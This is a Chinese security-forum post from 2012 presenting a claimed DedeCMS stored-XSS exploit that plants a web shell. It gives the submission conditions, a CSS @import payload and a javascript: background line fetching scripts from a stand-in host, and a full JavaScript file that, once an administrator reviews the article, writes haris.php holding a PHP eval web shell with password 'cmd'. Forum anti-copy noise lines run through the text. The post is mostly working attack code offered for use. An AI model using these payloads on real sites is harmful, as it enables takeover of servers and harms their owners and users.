中国网络渗透测试联盟
标题:
dedecms xss oday通杀所有版本 可getshell
[打印本页]
作者:
admin
时间:
2012-9-15 13:56
标题:
dedecms xss oday通杀所有版本 可getshell
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
# x, ]2 X% H: f1 ^+ E$ Z' C5 Z' C
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
2 Y* k4 o {5 s( x# f' d
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
. ]* |8 k! v/ m" y% Q
下面说说利用方法。
7 j8 i4 q% O6 a
条件有2个:
! s% P+ L4 q: b5 T
1.开启注册
& a5 Z8 A, z# y% @) z" p" v
2.开启投稿
& Q) \/ A# Q; F
注册会员----发表文章
# s. M& J: }% N7 U3 s
内容填写:
- ~8 U" I( D, e. Y2 t
复制代码
# h) \4 f' V* ^2 q2 b
<style>@im\port'\
http://xxx.com/xss.css';
</style>
+ F+ g) O+ A5 _
新建XSS.Css
: ]. u3 _2 [6 j& [+ F' z: J
复制代码
, g! v6 H. ]3 ?8 E) R3 C* g0 ^* F
.body{
' y! @ [- Y6 `5 K& D: s
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
+ v! J; F% x% v! k( Q2 z% ]
新建xss.js 内容为
' n4 |9 J8 f# `) n
复制代码
1 _. f8 H7 J) {, F3 d4 Z
1.var request = false;
/ w$ k% ]0 p9 L6 [/ y
2.if(window.XMLHttpRequest) {
) C, @! o4 j- k2 @+ t. ?$ c
3.request = new XMLHttpRequest();
3 J8 P7 v1 P: [. p& z% x
4.if(request.overrideMimeType) {
2 f/ B6 |7 J5 l- S- ]; N, G' G
5.request.overrideMimeType('text/xml');
! j9 ]( j4 x5 q" p' g# a
6.}
, W& \4 T- L# Q/ W9 W1 {' `( Z( {
7.} else if(window.ActiveXObject) {
' e8 i! K2 }* i4 w1 m% j1 I
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
3 \# o" @& k, y a& |6 H- ?
9.for(var i=0; i<versions.length; i++) {
4 J) C; Y; Y* r* J/ L
10.try {
8 }1 [# H' H- V% Y) g1 |+ y: R3 z5 S. E0 e
11.request = new ActiveXObject(versions);
% X% S% a. u( }% s* @8 `" k+ ?9 l8 Q* c
12.} catch(e) {}
$ j h) r, }$ p$ |+ `, M4 T6 S
13.}
# S( ]9 e; B6 C. |
14.}
7 Y( n @: P( |& n& n8 W
15.xmlhttp=request;
4 o/ ~+ l! y+ c0 w
16.function getFolder( url ){
$ Y3 O% k$ z \! ]8 m& ]
17. obj = url.split('/')
. q H0 w" s) w1 ^ _# a. R
18. return obj[obj.length-2]
/ O0 m% ]7 _8 j! x+ h
19.}
/ k* p9 D+ d, x$ ^% E$ _
20.oUrl = top.location.href;
( Y+ L4 M- v. S n
21.u = getFolder(oUrl);
1 J J8 \/ e( Z. a/ o2 C @
22.add_admin();
: P8 M& S0 q. u* ]
23.function add_admin(){
h5 F9 m% ?$ }$ C4 y- {
24.var url= "/"+u+"/sys_sql_query.php";
/ ^2 H& C( J: m
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
$ J% f1 J: C4 r) H4 g4 Q
26.xmlhttp.open("POST", url, true);
5 ?& {2 m/ e- p7 E- \7 ^8 s/ F" P
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
* l8 k( C6 R, c) h
28.xmlhttp.setRequestHeader("Content-length", params.length);
, Z1 H K9 }+ v% D* Z
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
8 h8 r- X* B) a" G
30.xmlhttp.send(params);
+ ^1 a2 R4 D6 I9 t: _
31.}
, ]# F7 T& `; h* l, p
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2